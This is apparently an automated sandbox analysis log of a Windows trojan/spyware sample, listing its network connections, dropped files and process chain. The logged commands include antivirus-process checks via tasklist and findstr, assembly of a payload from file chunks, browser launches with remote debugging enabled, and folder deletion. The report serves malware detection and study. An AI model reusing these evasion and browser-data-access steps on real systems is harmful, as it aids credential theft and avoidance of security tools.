    Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
    Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
    Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
    Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
    Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
    Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
    Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
    Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
    Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
    Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
    Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
    Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
    Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
    Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49700 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:49711 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:49806 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49919 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 159.69.102.165:443 -> 192.168.2.6:49924 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.30.17.174:443 -> 192.168.2.6:49988 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.30.17.174:443 -> 192.168.2.6:49998 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.177.85:443 -> 192.168.2.6:50021 version: TLS 1.2
    Source: C:\Users\user\Desktop\ton.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
    Source: C:\Users\user\Desktop\ton.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
    Source: C:\Users\user\Desktop\ton.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
    Source: C:\Users\user\Desktop\ton.exeFile created: C:\Windows\InterfacesDishesJump to behavior
    Source: C:\Users\user\Desktop\ton.exeFile created: C:\Windows\DrugIdentifierJump to behavior
    Source: C:\Users\user\Desktop\ton.exeFile created: C:\Windows\MistressExplainedJump to behavior
    Source: C:\Users\user\Desktop\ton.exeFile created: C:\Windows\MakingDennisJump to behavior
    Source: C:\Users\user\Desktop\ton.exeFile created: C:\Windows\RatingsFolkJump to behavior
    Source: C:\Users\user\Desktop\ton.exeFile created: C:\Windows\RefreshMinistryJump to behavior
    Source: C:\Users\user\Desktop\ton.exeCode function: 0_2_0040737E0_2_0040737E
    Source: C:\Users\user\Desktop\ton.exeCode function: 0_2_00406EFE0_2_00406EFE
    Source: C:\Users\user\Desktop\ton.exeCode function: 0_2_004079A20_2_004079A2
    Source: C:\Users\user\Desktop\ton.exeCode function: 0_2_004049A80_2_004049A8
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.com 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
    Source: C:\Users\user\Desktop\ton.exeCode function: String function: 004062CF appears 58 times
    Source: ton.exeStatic PE information: invalid certificate
    Source: ton.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@91/267@25/24
    Source: C:\Users\user\Desktop\ton.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
    Source: C:\Users\user\Desktop\ton.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\PVC7ZMAF.htmJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3872:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3616:120:WilError_03
    Source: C:\Users\user\Desktop\ton.exeFile created: C:\Users\user\AppData\Local\Temp\nsuF30A.tmpJump to behavior
    Source: ton.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Users\user\Desktop\ton.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\ton.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: 00Z589R1V.11.dr, D2DBI5PPH.11.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: ton.exeReversingLabs: Detection: 15%
    Source: C:\Users\user\Desktop\ton.exeFile read: C:\Users\user\Desktop\ton.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\ton.exe "C:\Users\user\Desktop\ton.exe"
    Source: C:\Users\user\Desktop\ton.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Batch Batch.cmd && Batch.cmd
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 471529
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "closingscriptsbeachescomplicated" Corners
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Virtue + ..\Economies + ..\Downloading + ..\Gets + ..\Month + ..\Command + ..\Mean + ..\Violin + ..\Original I
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.com Verzeichnis.com I
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2528 --field-trial-handle=2220,i,9226920140352858911,1917441030376040599,262144 /prefetch:8
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2716 --field-trial-handle=2508,i,14715817317759310349,9105508345091228975,262144 /prefetch:3
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1952,i,2601087111919839350,15526603101436537021,262144 /prefetch:3
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6108 --field-trial-handle=1952,i,2601087111919839350,15526603101436537021,262144 /prefetch:8
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6108 --field-trial-handle=1952,i,2601087111919839350,15526603101436537021,262144 /prefetch:8
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7028 --field-trial-handle=1952,i,2601087111919839350,15526603101436537021,262144 /prefetch:8
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7200 --field-trial-handle=1952,i,2601087111919839350,15526603101436537021,262144 /prefetch:8
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\RQI589ZCBA1V" & exit
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
    Source: C:\Users\user\Desktop\ton.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Batch Batch.cmd && Batch.cmdJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 471529Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "closingscriptsbeachescomplicated" Corners Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Virtue + ..\Economies + ..\Downloading + ..\Gets + ..\Month + ..\Command + ..\Mean + ..\Violin + ..\Original IJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.com Verzeichnis.com IJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
